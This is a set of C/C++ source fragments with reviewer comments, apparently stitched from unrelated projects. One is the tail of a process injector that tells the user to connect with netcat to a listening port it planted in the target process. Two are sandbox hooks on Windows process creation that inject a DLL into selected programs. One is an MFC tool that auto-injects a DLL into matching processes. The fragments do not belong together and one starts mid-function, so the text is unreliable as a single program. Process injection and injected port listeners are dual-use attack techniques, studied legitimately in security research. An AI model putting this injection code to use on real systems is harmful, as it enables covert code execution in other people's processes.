        // NOTE(review): TerminateProcess() returns a BOOL (0 on failure), so
        // the `== -1` test is never true and a failed termination is
        // reported as [OK].
        if ( TerminateProcess( pinfo.hProcess, 0 ) == -1 )
        {
            printf( " [FAIL] - %s\n", debug_string );
            ShowGetLastErrorString ( "InjectorDll:TerminateProcess(program)" );
        }
        else
            printf( " [OK] - %s.\n", debug_string );
    }

    debug_string = " Injection ended:";
    if ( return_function == _SUCCESS__ )
    {
        printf ( "\n" " [OK] - %s\n" " Try to connect to port written in \n" " C:\\ph_listen_ports.log, syntax: PID-PORT\n" " Example: nc 127.0.0.1 1234 (1234 is the first default port)\n" , debug_string );
    }
    else
        printf( "\n [FAIL] - %s\n", debug_string );

    return return_function;
}
// Detour for CreateProcessInternalW. The image under consideration (`lpfile`)
// is lpApplicationName when that is longer than one character, otherwise the
// command line. Decision order:
//   1. 16-bit (WOW VDM) creations are refused with ERROR_INVALID_PARAMETER.
//   2. Images whose name contains SumatraPDF.exe / java.exe / jp2launcher.exe
//      are created suspended and handed to InjectDll() afterwards (non-static
//      builds only).
//   3. With the "EnableWhiteList" setting > 0, anything not in the whitelist
//      is refused.
//   4. Otherwise whitelisted images pass, and non-whitelisted console (CUI)
//      images are refused.
// Refusals return FALSE after SetLastError(); everything else is forwarded to
// TrueCreateProcessInternalW.
//
// NOTE(review): the matching keys on the image name string only (stristrW
// looks like a case-insensitive substring search), and when both
// lpApplicationName and lpCommandLine are NULL `lpfile` is NULL — whether
// stristrW/in_whitelist tolerate that is not visible here.
BOOL WINAPI HookCreateProcessInternalW (HANDLE hToken, LPCWSTR lpApplicationName, LPWSTR lpCommandLine, LPSECURITY_ATTRIBUTES lpProcessAttributes, LPSECURITY_ATTRIBUTES lpThreadAttributes, BOOL bInheritHandles, DWORD dwCreationFlags, LPVOID lpEnvironment, LPCWSTR lpCurrentDirectory, LPSTARTUPINFOW lpStartupInfo, LPPROCESS_INFORMATION lpProcessInformation, PHANDLE hNewToken)
{
    BOOL ret = FALSE;
    LPWSTR lpfile = lpCommandLine;
    BOOL tohook = FALSE;
    if (lpApplicationName && wcslen(lpApplicationName)>1)
    {
        lpfile = (LPWSTR)lpApplicationName;
    }
    /* Refuse to start 16-bit programs */
    if (dwCreationFlags&CREATE_SHARED_WOW_VDM || dwCreationFlags&CREATE_SEPARATE_WOW_VDM)
    {
        SetLastError(ERROR_INVALID_PARAMETER);
        return ret;
    }
    /* Hosts of unsafe plugins: inject the protection DLL */
    if ( stristrW(lpfile, L"SumatraPDF.exe") || stristrW(lpfile, L"java.exe") || stristrW(lpfile, L"jp2launcher.exe"))
    {
        /* Remote injection cannot be enabled in a static build */
#if !defined(LIBPORTABLE_STATIC)
        // CREATE_SUSPENDED is OR-ed in; whether the child is resumed is up to
        // InjectDll() and not visible here. A caller that itself asked for
        // CREATE_SUSPENDED cannot be distinguished at this point.
        dwCreationFlags |= CREATE_SUSPENDED;
        tohook = TRUE;
#endif
    }
    /* Whitelist regime enabled (strict check) */
    else if ( read_appint(L"General",L"EnableWhiteList") > 0 )
    {
        if ( !in_whitelist((LPCWSTR)lpfile) )
        {
#ifdef _LOGDEBUG
            logmsg("the process %ls disabled-runes\n",lpfile);
#endif
            SetLastError( TrueRtlNtStatusToDosError(STATUS_ERROR) );
            return ret;
        }
    }
    else if ( in_whitelist((LPCWSTR)lpfile) )
    {
        ;   // whitelisted: pass through untouched
    }
    /* Not whitelisted: automatically block console programs from starting */
    else
    {
        if ( ProcessIsCUI(lpfile) )
        {
#ifdef _LOGDEBUG
            logmsg("%ls process, disabled-runes\n",lpfile);
#endif
            SetLastError( TrueRtlNtStatusToDosError(STATUS_ERROR) );
            return ret;
        }
    }
    ret = TrueCreateProcessInternalW(hToken,lpApplicationName,lpCommandLine,lpProcessAttributes, lpThreadAttributes,bInheritHandles,dwCreationFlags,lpEnvironment,lpCurrentDirectory, lpStartupInfo,lpProcessInformation,hNewToken);
    if ( ret && tohook )
    {
#ifdef _LOGDEBUG
        logmsg("InjectDll run .\n");
#endif
        InjectDll(lpProcessInformation);
    }
    return ret;
}
// Refreshes the process list view from a fresh Toolhelp snapshot and, when
// imgName is given, injects dllName into processes whose image name matches
// it. Row i of the control is kept in step with the i-th snapshot entry:
// matching rows are left alone, stale rows are deleted and re-inserted, and
// rows beyond the snapshot are removed. Rows that disappear are looked up in
// pidInfo ("<exe>|<pid>|" entries); a hit logs "Process Exited" and drops the
// entry.
//
// @param lv      the process list control (column 0 image name, column 1 PID).
// @param imgName image name to auto-inject, or NULL to disable auto-injection.
// @param dllName DLL path handed to InjectDll().
//
// NOTE(review): hSnapshot and the Process32First() result are not checked.
// The first snapshot entry is auto-injected without the pidInfo check and
// logging that the loop applies to the remaining entries.
void CdllInjectDoc::updateProcList(CListCtrl* lv, LPCTSTR imgName, LPSTR dllName)
{
    // create Process Snapshot
    HANDLE hSnapshot;
    hSnapshot = CreateToolhelp32Snapshot(TH32CS_SNAPPROCESS, NULL);
    PROCESSENTRY32 pe = {sizeof(PROCESSENTRY32)};
    // first snapshot
    Process32First(hSnapshot, &pe);
    // index, pid string
    int index = 0;
    TCHAR pid[20];
    TCHAR emptyPid[20] = {0};
    wsprintf(pid, _T("%d"), pe.th32ProcessID);
    // 1st, 2nd item text (exe file, pid)
    CString first, second;
    first = lv->GetItemText(0, 0);
    second = lv->GetItemText(0, 1);
    // update first process information
    if (pe.th32ProcessID != _ttoi(second.GetBuffer(0)) || _tcsicmp(pe.szExeFile, first.GetBuffer(0)) != 0)
    {
        lv->DeleteItem(0);
        index = lv->InsertItem(0, pe.szExeFile);
        lv->SetItem(index, 1, LVIF_TEXT, pid, 0, 0, 0, NULL);
    }
    // check automatic inject option
    if (imgName != NULL && _tcsicmp(imgName,pe.szExeFile) == 0)
    {
        InjectDll(pe.th32ProcessID, dllName);
    }
    // empty pid string
    //memcpy_s(pid, 20, emptyPid, 20);
    // insert next items
    int i = index + 1;
    // update next process informations
    while(Process32Next(hSnapshot, &pe) != FALSE)
    {
        first = lv->GetItemText(i, 0);
        second = lv->GetItemText(i, 1);
        // check automatic inject option
        if (imgName != NULL && _tcsicmp(imgName, pe.szExeFile) == 0)
        {
            // empty pid string
            memcpy_s(pid, 20, emptyPid, 20);
            _itot_s(pe.th32ProcessID, pid, 20, 10);
            // pidInfo key for this process: "<exe>|<pid>|"
            CString temp;
            temp.Append(pe.szExeFile);
            temp += _T("|");
            temp.Append(pid);
            temp += _T("|");
            // Already injected: skip this row entirely (the row text is not
            // re-checked against the snapshot entry on this path).
            if (pidInfo.Find(temp, 0) != -1)
            {
                i++;
                continue;
            }
            TCHAR line[260];
            _stprintf_s(line, 260, _T("Injecting %s(%d)... 
"), pe.szExeFile, pe.th32ProcessID);
            writeLog(CString(line));
            if (InjectDll(pe.th32ProcessID, dllName) == TRUE)
            {
                writeLog(CString("SUCCEED.\r\n"));
                pidInfo += temp;
            }
            else
                writeLog(CString("FAILED.\r\n"));
        }
        // if already in listview, skip
        if (pe.th32ProcessID == _ttoi(second.GetBuffer(0)) && _tcsicmp(pe.szExeFile, first.GetBuffer(0)) == 0)
        {
            i++;
            continue;
        }
        // delete old process info, and inform that is exited & delete from injection list
        CString temp;
        temp = first + _T("|") + second + _T("|");
        if (pidInfo.Find(temp) != -1)
        {
            CString output;
            output = _T("Process Exited: ") + first + _T("(") + second + _T(").") + _T("\r\n");
            writeLog(output);
            pidInfo.Replace(temp, _T(""));
        }
        lv->DeleteItem(i);
        index = lv->InsertItem(i, pe.szExeFile);
        wsprintf(pid, _T("%d"), pe.th32ProcessID);
        lv->SetItem(index, 1, LVIF_TEXT, pid, 0, 0, 0, NULL);
        i++;
    }
    CloseHandle(hSnapshot);
    // if listcount is more than process list, delete records
    while (i < lv->GetItemCount())
    {
        // delete old process info, and inform that is exited & delete from injection list
        first = lv->GetItemText(i, 0);
        second = lv->GetItemText(i, 1);
        CString temp;
        temp = first + _T("|") + second + _T("|");
        if (pidInfo.Find(temp) != -1)
        {
            CString output;
            output = _T("Process Exited: ") + first + _T("(") + second + _T(").") + _T("\r\n");
            writeLog(output);
            pidInfo.Replace(temp, _T(""));
        }
        // DeleteItem(i) shifts later rows down, yet i still advances, so only
        // every other trailing row is removed per call.
        lv->DeleteItem(i);
        i++;
    }
}
// Detour for NtCreateUserProcess. The decision keys on
// ProcessParameters->ImagePathName:
//   - names containing SumatraPDF.exe / java.exe / jp2launcher.exe are
//     created normally and, on success, suspended and handed to InjectDll();
//   - with "EnableWhiteList" > 0, anything not in the whitelist gets the
//     zeroed mY_ProcessParameters instead of its own parameters;
//   - otherwise whitelisted images pass, and non-GUI images likewise get the
//     zeroed parameters.
// Passing a zeroed RTL_USER_PROCESS_PARAMETERS presumably makes the real call
// fail (the debug log calls it "disabled-runes"); the exact effect is decided
// inside TrueNtCreateUserProcess and is not visible here.
//
// NOTE(review): ProcessParameters is dereferenced without a NULL check, and
// the injection path only compiles when tcmalloc, GCC and LIBPORTABLE_STATIC
// are all absent (see the comment on the #if below).
NTSTATUS WINAPI HookNtCreateUserProcess(PHANDLE ProcessHandle,PHANDLE ThreadHandle, ACCESS_MASK ProcessDesiredAccess,ACCESS_MASK ThreadDesiredAccess, POBJECT_ATTRIBUTES ProcessObjectAttributes, POBJECT_ATTRIBUTES ThreadObjectAttributes, ULONG CreateProcessFlags, ULONG CreateThreadFlags, PRTL_USER_PROCESS_PARAMETERS ProcessParameters, PVOID CreateInfo, PNT_PROC_THREAD_ATTRIBUTE_LIST AttributeList)
{
    RTL_USER_PROCESS_PARAMETERS mY_ProcessParameters;   // all-zero substitute used to block a creation
    PROCESS_INFORMATION ProcessInformation;
    NTSTATUS status;
    BOOL tohook = FALSE;
    fzero(&mY_ProcessParameters,sizeof(RTL_USER_PROCESS_PARAMETERS));
    if ( stristrW(ProcessParameters->ImagePathName.Buffer, L"SumatraPDF.exe") || stristrW(ProcessParameters->ImagePathName.Buffer, L"java.exe") || stristrW(ProcessParameters->ImagePathName.Buffer, L"jp2launcher.exe"))
    {
        tohook = TRUE;
    }
    else if ( read_appint(L"General",L"EnableWhiteList") > 0 )
    {
        if ( ProcessParameters->ImagePathName.Length > 0 && in_whitelist((LPCWSTR)ProcessParameters->ImagePathName.Buffer) )
        {
#ifdef _LOGDEBUG
            logmsg("the process %ls in whitelist\n",ProcessParameters->ImagePathName.Buffer);
#endif
        }
        else
        {
#ifdef _LOGDEBUG
            logmsg("the process %ls disabled-runes\n",ProcessParameters->ImagePathName.Buffer);
#endif
            ProcessParameters = &mY_ProcessParameters;
        }
    }
    else if ( in_whitelist((LPCWSTR)ProcessParameters->ImagePathName.Buffer) )
    {
        ;   // whitelisted: pass through untouched
    }
    else
    {
        if ( !IsGUI((LPCWSTR)ProcessParameters->ImagePathName.Buffer) )
            ProcessParameters = &mY_ProcessParameters;
    }
    status = TrueNtCreateUserProcess(ProcessHandle, ThreadHandle, ProcessDesiredAccess, ThreadDesiredAccess, ProcessObjectAttributes, ThreadObjectAttributes, CreateProcessFlags, CreateThreadFlags, ProcessParameters, CreateInfo, AttributeList);
    if ( NT_SUCCESS(status)&&tohook)
    {
        ULONG Suspend = 0;   // previous suspend count, written by TrueNtSuspendThread and not read
        fzero(&ProcessInformation,sizeof(PROCESS_INFORMATION));
        ProcessInformation.hProcess = *ProcessHandle;
        ProcessInformation.hThread = *ThreadHandle;
        /* when tcmalloc enabled or MinGW compile time,InjectDll crash on win8/8.1 */
#if !defined(ENABLE_TCMALLOC) && !defined(__GNUC__) && !defined(LIBPORTABLE_STATIC)
        // The new thread is suspended before injection; nothing in this
        // function resumes it, so that is left to InjectDll() (not visible here).
        if ( NT_SUCCESS(TrueNtSuspendThread(ProcessInformation.hThread,&Suspend)) )
        {
#ifdef _LOGDEBUG
            logmsg("NtInjectDll() run .\n");
#endif
            InjectDll(&ProcessInformation);
        }
#endif
    }
    return status;
}